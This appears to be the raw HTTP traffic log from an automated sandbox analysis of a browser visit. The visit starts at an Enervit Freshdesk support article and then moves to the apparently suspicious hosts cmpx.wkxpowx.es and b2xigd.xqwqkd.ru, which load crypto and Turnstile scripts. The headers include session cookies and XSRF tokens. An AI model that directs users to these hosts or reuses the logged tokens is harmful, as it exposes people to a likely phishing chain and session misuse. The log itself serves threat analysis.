              Source: global trafficHTTP traffic detected: GET /assets/cdn/portal/scripts/integrations.js HTTP/1.1Host: enervit.freshdesk.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://enervit.freshdesk.com/support/solutions/articles/156000285380-prossimo-cambio-di-qualit%C3%A0Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _x_w=46_1; _x_m=x_c
              Source: global trafficHTTP traffic detected: GET /fonts/icomoon.ttf?aysp4f HTTP/1.1Host: assets1.freshdesk.comConnection: keep-aliveOrigin: https://enervit.freshdesk.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://enervit.freshdesk.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /support/recaptcha HTTP/1.1Host: enervit.freshdesk.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://enervit.freshdesk.com/support/solutions/articles/156000285380-prossimo-cambio-di-qualit%C3%A0Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _x_w=46_1; _x_m=x_c; _helpkit_session=bFdNczRMUDByc2tnSHo0WGY0bmFkOVRLanMwVEg1SXRRYnpHM0N3dVdLdk1tWUg5NU9Ram5zQXBxcVQ1THhlTFJzSEl0RlVpSlhkQXZ4RGxTb0J5MGc9PS0tc3NDcjNLRFAyb0grd2pET3N3MDVvQT09--49ba22a1c3ce44ca630a7290e91e22a532a43b61
              Source: global trafficHTTP traffic detected: GET /support/solutions/articles/156000285380-prossimo-cambio-di-qualit%C3%A0/hit HTTP/1.1Host: enervit.freshdesk.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _x_w=46_1; _x_m=x_c; _helpkit_session=bFdNczRMUDByc2tnSHo0WGY0bmFkOVRLanMwVEg1SXRRYnpHM0N3dVdLdk1tWUg5NU9Ram5zQXBxcVQ1THhlTFJzSEl0RlVpSlhkQXZ4RGxTb0J5MGc9PS0tc3NDcjNLRFAyb0grd2pET3N3MDVvQT09--49ba22a1c3ce44ca630a7290e91e22a532a43b61
              Source: global trafficHTTP traffic detected: GET /assets/cdn/portal/scripts/preview-interactions.js HTTP/1.1Host: enervit.freshdesk.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://enervit.freshdesk.com/support/solutions/articles/156000285380-prossimo-cambio-di-qualit%C3%A0Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _x_w=46_1; _x_m=x_c; _helpkit_session=bFdNczRMUDByc2tnSHo0WGY0bmFkOVRLanMwVEg1SXRRYnpHM0N3dVdLdk1tWUg5NU9Ram5zQXBxcVQ1THhlTFJzSEl0RlVpSlhkQXZ4RGxTb0J5MGc9PS0tc3NDcjNLRFAyb0grd2pET3N3MDVvQT09--49ba22a1c3ce44ca630a7290e91e22a532a43b61
              Source: global trafficHTTP traffic detected: GET /recaptcha/enterprise.js HTTP/1.1Host: www.recaptcha.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://enervit.freshdesk.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/misc/logo.png HTTP/1.1Host: enervit.freshdesk.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://enervit.freshdesk.com/support/solutions/articles/156000285380-prossimo-cambio-di-qualit%C3%A0Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _x_w=46_1; _x_m=x_c; _helpkit_session=NFFuazkxeTdCbVVIY2JSMmVjU0hXZk9udWZ0TWpRRG56TzA0OHpRRGZWcUhMZGwxU3RHTWt1akVrVHB6b1YxTkRSS3hBZVBUenR4NUhUQytEK0swcFE9PS0teWU5UVVIbjl4OXlkanVsbjRrQTFqUT09--3fb637559c60a6cd5726186eeb81ff4bb424b746
              Source: global trafficHTTP traffic detected: GET /recaptcha/enterprise/anchor?ar=1&k=6LdvejUUAAAAAEn6wjOFcPVRyQr4KtAJ03ltA1SQ&co=aHR0cHM6Ly9lbmVydml0LmZyZXNoZGVzay5jb206NDQz&hl=en&v=J79K9xgfxwT6Syzx-UyWdD89&theme=light&size=normal&cb=948lpdq12c8i HTTP/1.1Host: www.recaptcha.netConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://enervit.freshdesk.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/misc/logo.png HTTP/1.1Host: enervit.freshdesk.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _x_w=46_1; _x_m=x_c; _helpkit_session=RmVtdDNOZFBoMnc1c0xNcnN6TG9NbENORFZJWTJmYWdDSkhHRlRDUHQrbWVBalYwYkhJYm1WZXd6eFU3eHYvTjRXVWxaQ3BaRlc3K3VtLzNmOEc1L2c9PS0tR0dpY1BlRSt4RVNuNmdWaURNQklJQT09--0d4680b524a4a8bd8b1a6bad57b25c3de68b4de4
              Source: global trafficHTTP traffic detected: GET /recaptcha/enterprise/webworker.js?hl=en&v=J79K9xgfxwT6Syzx-UyWdD89 HTTP/1.1Host: www.recaptcha.netConnection: keep-aliveAccept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerSec-Fetch-Storage-Access: activeReferer: https://www.recaptcha.net/recaptcha/enterprise/anchor?ar=1&k=6LdvejUUAAAAAEn6wjOFcPVRyQr4KtAJ03ltA1SQ&co=aHR0cHM6Ly9lbmVydml0LmZyZXNoZGVzay5jb206NDQz&hl=en&v=J79K9xgfxwT6Syzx-UyWdD89&theme=light&size=normal&cb=948lpdq12c8iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/misc/favicon.ico?702017 HTTP/1.1Host: enervit.freshdesk.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://enervit.freshdesk.com/support/solutions/articles/156000285380-prossimo-cambio-di-qualit%C3%A0Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _x_w=46_1; _x_m=x_c; _helpkit_session=ZlQwa3hPaUZzSkJTR1pnMTdZVlBWV2R2YmYySk5ScnluOVEyUU9Rd0VhTEMyMDRFRlZ0RVdGK1k2RkVUZE8yM1ZQZDBSNnBncTRicmo3a2Vrclc0TlE9PS0tNzNiRlp4a3gxMnBibkZBU2syRmZSdz09--1054a9ada3f370bfd77e9e889ca5fd60a879106b
              Source: global trafficHTTP traffic detected: GET /recaptcha/enterprise/bframe?hl=en&v=J79K9xgfxwT6Syzx-UyWdD89&k=6LdvejUUAAAAAEn6wjOFcPVRyQr4KtAJ03ltA1SQ HTTP/1.1Host: www.recaptcha.netConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://enervit.freshdesk.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/misc/favicon.ico?702017 HTTP/1.1Host: enervit.freshdesk.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://enervit.freshdesk.com/support/solutions/articles/156000285380-prossimo-cambio-di-qualit%C3%A0Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _x_w=46_1; _x_m=x_c; _helpkit_session=REJjell6QXVsTlpHUnNoaVVpbzJkK0hrQTQydllEUjM4UFVoUE1kZG5uVnZ4VDhQajk0Zm9ZK01wTEIwdk9Xa0NFRFBGRDlRcS9rMmxUdkNhTmRhZWc9PS0tYSs4T1VvMllMMmhKY0RONUZmSzdvZz09--98b5c32bb1c128ac11e978291f34155f099c42a4If-None-Match: "a44c13cd56199dfc5fa127fbbd968ad63eacf0d7152b64b1e0f19579fdf73946"
              Source: global trafficHTTP traffic detected: GET /assets/misc/favicon.ico?702017 HTTP/1.1Host: enervit.freshdesk.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _x_w=46_1; _x_m=x_c; _helpkit_session=REJjell6QXVsTlpHUnNoaVVpbzJkK0hrQTQydllEUjM4UFVoUE1kZG5uVnZ4VDhQajk0Zm9ZK01wTEIwdk9Xa0NFRFBGRDlRcS9rMmxUdkNhTmRhZWc9PS0tYSs4T1VvMllMMmhKY0RONUZmSzdvZz09--98b5c32bb1c128ac11e978291f34155f099c42a4
              Source: global trafficHTTP traffic detected: GET /assets/misc/favicon.ico?702017 HTTP/1.1Host: enervit.freshdesk.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _x_w=46_1; _x_m=x_c; _helpkit_session=TjVTa3FUZHZrYy84ZTNkM3NGME44cW1MeHdLWGo1cEVUN1ZQSGJIcjVoRkNNWDNWcTNXV2VVdE83Vld2Q3ptUk44MkVpU2hKQmdhWTVLZ2k0SWl6S3c9PS0tUjhVK1RIMkZYZlJGaVMwRnA4TXRsUT09--6eaca9ab5605762a4bfbee13fad5f1ea3dec5b52If-None-Match: "a44c13cd56199dfc5fa127fbbd968ad63eacf0d7152b64b1e0f19579fdf73946"
              Source: global trafficHTTP traffic detected: GET /GUGXxy/ HTTP/1.1Host: cmpx.wkxpowx.esConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://enervit.freshdesk.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://cmpx.wkxpowx.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://cmpx.wkxpowx.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://cmpx.wkxpowx.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/f3b948d8acb8/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://cmpx.wkxpowx.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /favicon.png HTTP/1.1Host: developers.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://cmpx.wkxpowx.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /favicon.png HTTP/1.1Host: developers.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=IhSEgkk7Ed89UIOCWOCEGCg.spHL2BdCk3Mv2THgy9c-1742384073-1.0.1.1-rqMYB9CrfoZqmGM9fkMwTlFTVJ8XUxXJYDmlagXpJ2PCEHoOTvJbfCfi5On3y9sFGHXLNpI9fHLnXYJD6BjuVMa8BqIVwW7pgKZPDZLxFic
              Source: global trafficHTTP traffic detected: GET /tatay$wkg3t HTTP/1.1Host: b2xigd.xqwqkd.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: https://cmpx.wkxpowx.esSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://cmpx.wkxpowx.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /tatay$wkg3t HTTP/1.1Host: b2xigd.xqwqkd.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /GUGXxy/ HTTP/1.1Host: cmpx.wkxpowx.esConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://cmpx.wkxpowx.es/GUGXxy/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkVsVXgvTWhPMzNmYVB4cExhL3N3V2c9PSIsInZhbHVlIjoia0tQODFwSUxJL1pEaVgxWGs0ckc1cm9Ia0tHWnZtOVQ3N2g1RW9pNUpkZGJiT3Y2dXZBSVE5RzkyT2RHd3E4WXBZQXJZVFd5eURsQnVBZWc5U01qSFRjcDlSUmhFSG5udTJ1Vm1ubnpKeTV3VERWZzhWK2cyZ2tFa3NqOUhpRmciLCJtYWMiOiJkMGFkNzVhYWQ0NDE0Y2U3NmU5ZDk3ZDljNTEyMDI1ZmYzYTM3ZmE3YmU2MDVlOTY2MmJhNDBkNDA0ODI3ZjI2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImxJVmtsd3lEaUJRYThOYzROY3cvV1E9PSIsInZhbHVlIjoicUFJNHU1Z3JqcG5CQ3lDRHljL1NBdlhBQmFUS1Y4SXZJUDBuWkhkTm9kd0NvQVB0Rkhyai9oajVjT0wvMmRKV1ozU0NORmwzSklFRmtUdjZadmdjMnByQlRBQkp2cms0YStteHppUE96bTJQSVgrMmVJSjFTQ1Ayc0oydjJVL0giLCJtYWMiOiI3MDM2ZmM3ZTlhYTFlZmRmYjY4NmU1OGIwNzg3YWY2YTRhZmUzMzVjMjM3MmY5N2JmY2M0NzMyNDlmYzEyMGE0IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /ajefR11OzS32YGVsoSGIu9JI8R6D780tEiCha9UExsu HTTP/1.1Host: cmpx.wkxpowx.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkVsVXgvTWhPMzNmYVB4cExhL3N3V2c9PSIsInZhbHVlIjoia0tQODFwSUxJL1pEaVgxWGs0ckc1cm9Ia0tHWnZtOVQ3N2g1RW9pNUpkZGJiT3Y2dXZBSVE5RzkyT2RHd3E4WXBZQXJZVFd5eURsQnVBZWc5U01qSFRjcDlSUmhFSG5udTJ1Vm1ubnpKeTV3VERWZzhWK2cyZ2tFa3NqOUhpRmciLCJtYWMiOiJkMGFkNzVhYWQ0NDE0Y2U3NmU5ZDk3ZDljNTEyMDI1ZmYzYTM3ZmE3YmU2MDVlOTY2MmJhNDBkNDA0ODI3ZjI2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImxJVmtsd3lEaUJRYThOYzROY3cvV1E9PSIsInZhbHVlIjoicUFJNHU1Z3JqcG5CQ3lDRHljL1NBdlhBQmFUS1Y4SXZJUDBuWkhkTm9kd0NvQVB0Rkhyai9oajVjT0wvMmRKV1ozU0NORmwzSklFRmtUdjZadmdjMnByQlRBQkp2cms0YStteHppUE96bTJQSVgrMmVJSjFTQ1Ayc0oydjJVL0giLCJtYWMiOiI3MDM2ZmM3ZTlhYTFlZmRmYjY4NmU1OGIwNzg3YWY2YTRhZmUzMzVjMjM3MmY5N2JmY2M0NzMyNDlmYzEyMGE0IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://cmpx.wkxpowx.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Range: bytes=65536-65536If-Range: "28feccc0-15d9d"
              Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://cmpx.wkxpowx.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Range: bytes=65536-89500If-Range: "28feccc0-15d9d"
              Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: cmpx.wkxpowx.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cmpx.wkxpowx.es/GUGXxy/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkpMOElQU012NVpFWmlicHZrVWc0alE9PSIsInZhbHVlIjoidEdvczU5NjBRSStnZnpoUWdXUlpKMkIvMkxOckpsVGlTQU9rMUtmSWhzRFl5cytid0hxVm5CQ2NzSHdvYmttZzZ5R0F2VjVsRlFraU1GVjIxMTRNcm02VzE5QVNSWG5xQWpWd0F4YTJKNXUzTjAxay9mN3RyQ1QvVjA5WkxldkYiLCJtYWMiOiIzNzg4YzRjNTVhZDM1MmFkYzljMTUxOTlmN2Q3MDcwZTlhODY3NjQ2YThhZmQ4MzI1MTBlNDE5ZjAzM2Q1YTEzIiwidGFnIjoiIn0%3D; 